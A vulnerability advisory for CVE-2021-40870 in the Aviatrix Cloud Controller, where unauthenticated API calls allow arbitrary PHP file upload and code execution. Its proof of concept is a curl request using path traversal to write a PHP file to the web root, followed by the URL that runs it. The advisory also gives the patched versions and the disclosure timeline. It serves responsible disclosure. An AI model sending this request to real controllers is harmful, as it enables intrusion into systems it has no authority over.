Advisory

Unrestricted upload of file with dangerous type in Aviatrix allows an authenticated user to execute arbitrary code

Overview

While the Aviatrix UI requires authentication, many API calls do not enforce a check for authentication. Some of these API calls allow an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem. These uploaded scripts will be processed by the web frontend, allowing an attacker to run code of their choosing.

Proof of concept

  1. Make the following request to the Aviatrix Cloud Controller aviatrix:
curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/test.php -d 'data=hello<?php phpinfo()?>'
  1. Visit https://aviatrix.domain.tld/v1/test. This will show the PHP Version page.

Mitigation/further actions

Upgrade to one of the following versions:

  • UserConnect-6.2-1804.2043 or later
  • UserConnect-6.3-1804.2490 or later
  • UserConnect-6.4-1804.2838 or later
  • UserConnect-6.5-1804.1922 or later

Advisory timeline

  1. 2021-05-12: Discovered
  2. 2021-08-24: Reported to Aviatrix security team
  3. 2021-08-26: Aviatrix security team confirm vulnerability will be fixed in forthcoming release
  4. 2021-09-11: Fix released
  5. 2021-09-12: CVE requested
  6. 2021-09-13: CVE allocated

CVSS

Base score 10.0
Attack vector Network
Attack complexity Low
Privileges required None
User interaction None
Scope Changed
Confidentiality High
Integrity High
Availability High

Metadata

  • Severity
    Critical (base score 10.0)
  • Discovered by
    Mark Steward
  • Severity
    High
  • Advisory ID
    tc-2021-0002
  • CVE
    CVE-2021-40870
  • Component/package
    Cloud Controller
  • Version
    050120 (2020-08-17, R6.1.1280)
  • Published
    2021-08-24

© 2022 Tradecraft Ltd. Tradecraft Ltd is a company registered in England & Wales, no. 10984430. Registered address 86-90 Paul Street, London, EC2A 4NE.

Privacy policy / Events code of conduct / Responsible disclosure